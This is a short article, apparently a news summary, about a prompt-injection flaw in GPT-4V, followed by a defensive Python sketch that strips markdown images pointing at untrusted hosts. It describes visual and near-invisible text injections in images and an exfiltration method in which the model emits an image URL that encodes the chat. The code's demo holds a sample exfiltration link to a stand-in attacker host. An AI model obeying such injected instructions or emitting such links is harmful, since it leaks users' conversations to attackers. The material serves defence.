A recently disclosed prompt injection vulnerability in GPT-4V, which can be exploited to leak users' chat records, has drawn widespread attention. Reported attack techniques include visual prompt injection (malicious instructions embedded as visible text in an image), covert text injection (instructions hidden in an image at near-invisible contrast, legible to the model but not to a human reviewer), and exfiltration attacks that smuggle chat records out, for instance by inducing the model to emit an image URL that encodes the conversation so that rendering it sends the data to an attacker's server. Existing security measures mitigate but do not fully block these attacks, underscoring the defensive challenges posed by large AI models. There is currently no definitive solution, and the issue requires further research and preventive measures.
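The exfiltration path above suggests one common client-side mitigation: refuse to auto-render image links whose host is not explicitly trusted, so an injected prompt cannot turn the chat client into a data channel. The following is a minimal illustrative sketch, not GPT-4V's actual defense; the allowlist contents, the function name strip_untrusted_images, and the assumption that the client renders markdown output are all hypothetical.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the chat client may fetch images from.
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}

# Matches markdown image syntax: ![alt](url ...)
MD_IMAGE_RE = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")


def strip_untrusted_images(model_output: str) -> str:
    """Remove markdown images that point at hosts outside the allowlist.

    An injected prompt can ask the model to emit an image whose URL encodes
    the conversation; if the client auto-renders it, the HTTP request leaks
    the data. Declining to render untrusted image URLs closes that channel.
    """
    def _filter(match: re.Match) -> str:
        host = urlparse(match.group("url")).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # trusted host: keep the image as-is
        return "[image removed: untrusted host]"

    return MD_IMAGE_RE.sub(_filter, model_output)


if __name__ == "__main__":
    # A response shaped the way an exfiltration prompt would request it.
    leaked = "![x](https://attacker.example/log?q=chat+history+here)"
    print(strip_untrusted_images(leaked))
    # -> [image removed: untrusted host]
```

Filtering at render time rather than at generation time is deliberate in this sketch: the model's output cannot be fully trusted once injected content has reached it, so the last trusted component, the client, enforces the policy.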